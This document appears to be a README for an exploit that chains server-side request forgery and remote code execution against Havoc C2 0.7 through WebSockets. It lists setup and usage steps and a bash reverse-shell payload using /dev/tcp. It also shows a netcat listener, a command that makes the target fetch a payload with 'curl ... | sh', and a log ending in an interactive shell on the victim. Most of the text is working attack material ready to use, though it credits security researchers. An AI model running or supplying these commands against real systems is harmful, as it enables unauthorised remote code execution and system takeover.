Havoc-C2-SSRF-RCE-Exploit

Merged Proofs of Concept (PoCs) for Server-Side Request Forgery (SSRF) and Remote Code Execution (RCE) that execute arbitrary code through WebSockets on Havoc C2 version 0.7 in a more comfortable way.

This merged version of the two PoCs relies heavily on the work of @chebuya & @IncludeSecurity! Without them, no exploit would exist here. Mad respect for their skills and hard work!

Preparation

$ python3 -m virtualenv venv
$ source venv/bin/activate
$ pip install -r requirements.txt

Usage

$ python3 exploit.py -h
usage: exploit.py [-h] -t TARGET [-p PORT] -i INTERNAL_IP --internal-port INTERNAL_PORT --payload-url PAYLOAD_URL --username USERNAME --password PASSWORD

options:
  -h, --help            show this help message and exit
  -t, --target TARGET   Target URL with scheme (e.g., https://10.10.10.10)
  -p, --port PORT       Optional port (inferred from scheme or URL)
  -i, --internal-ip INTERNAL_IP
                        Internal IP behind the web server
  --internal-port INTERNAL_PORT
                        Internal Havoc C2 port
  --payload-url PAYLOAD_URL
                        Payload URL to fetch and execute
  --username USERNAME   WebSocket login username
  --password PASSWORD   WebSocket login password

Payload

$ cat payload
#!/bin/bash
bash -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'

Local Listener

$ nc -lnvp <LPORT>

Web Server providing the payload

$ python3 -m http.server 80

Command Example

$ python3 exploit.py -t https://<RHOST> -i 127.0.0.1 --internal-port 40056 --payload-url 'curl http://<LHOST>/payload | sh' --username <USERNAME> --password '<PASSWORD>'

Execution Example

$ python3 exploit.py -t https://192.168.1.1 -i 127.0.0.1 --internal-port 40056 --payload-url 'curl http://192.168.1.2/payload | sh' --username testuser --password 'testpassword'

[*] Registering agent...
[+] Agent registered.
[*] Opening socket on teamserver...
[+] Socket opened.
[*] Writing to socket...
[+] Socket write successful.
[*] Reading from socket...
[*] Writing to socket...
[+] Socket write successful.
[*] Reading from socket...
[!] No response from WebSocket.
[*] Writing to socket...
[+] Socket write successful.
[*] Reading from socket...
[!] No response from WebSocket.
[*] Writing to socket...
[+] Socket write successful.
[*] Reading from socket...
[!] No response from WebSocket.
$ nc -lnvp 9001
listening on [any] 9001 ...
connect to [192.168.1.2] from (UNKNOWN) [192.168.1.1] 60048
bash: cannot set terminal process group (3251): Inappropriate ioctl for device
bash: no job control in this shell
testuser@havoc:~/Havoc/payloads/Demon$

Credits